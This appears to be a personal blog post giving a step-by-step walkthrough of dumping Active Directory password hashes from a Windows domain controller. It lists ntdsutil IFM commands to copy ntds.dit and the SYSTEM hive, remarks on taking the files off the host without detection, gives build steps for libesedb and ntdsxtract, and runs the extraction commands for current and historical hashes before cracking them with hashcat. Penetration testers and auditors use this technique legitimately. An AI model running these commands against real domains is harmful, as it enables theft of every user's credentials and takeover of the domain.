credential mining a domain controller

the target system was windows 2k8 server r2

the active directory (file ntds.dit) contains the current and historical password hashes of all domain users – a goldmine

========================================
taking a copy of the files
========================================
the relevant files (ntds.dit, and the SAM/SYSTEM registry) are locked by the OS, so you need to run a special tool to clone them

several other tools are available (e.g. vssadmin, ninjacopy, …)

i used ntdsutil because it seemed the simplest in my case

ntdsutil
activate instance ntds
ifm
create full c:\backup

========================================
installing the utils
========================================
i elected to exfiltrate the files and process them in kali

in the case of a large domain and correspondingly large files, exfiltration without detection may present its own challenges

there are alternative methods for in-situ extraction, and even a metasploit module which will perform the attack in memory on the target and stream the results to you, but i chose this option because the domain wasn’t very big and it meant that after transferring the files i was under no time pressure; i didn’t need to worry about being kicked off while figuring stuff out

building/installing libesedb
============================
i had problems building libesedb initially, but after cycling through re-running autogen.sh/configure a few times, it just worked

if you get the error ‘Missing file remove function’, add ‘#define HAVE_UNLINK 1’ to libcfile/libcfile_support.c (i experienced this error in one build, but not in another – strange!)

apt-get install git autoconf automake autopoint libtool pkg-config build-essential
git clone https://github.com/libyal/libesedb.git
cd libesedb
./synclibs.sh
./autogen.sh
./configure
make
make install
ldconfig

installing ntdsxtract
=====================
cd /opt
git clone https://github.com/csababarta/ntdsxtract.git

========================================
hash extraction
========================================
in the directory where the “Active Directory” and “registry” dirs are, which you exfiltrated:

esedbexport -m tables “Active Directory/ntds.dit”
python /opt/ntdsxtract/dsusers.py ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 hashdumpwork –syshive registry/SYSTEM –lmoutfile $PWD/lm-out.txt –ntoutfile $PWD/nt-out.txt –pwdformat ocl –passwordhashes –passwordhistory | tee ntdxtract.out

note that the table names might be different. here i’m using ‘datatable.3’ but it might be ‘datatable.7’ or whatever. same deal with link_table

i had problems exporting the hashes to lm-out.txt and nt-out.txt until i fully specified the path. weird

now crack those hashes with hashcat

# references
blog.joelj.org/windows-password-audit-with-kali-linux
www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html

Leave a Reply

Your email address will not be published. Required fields are marked *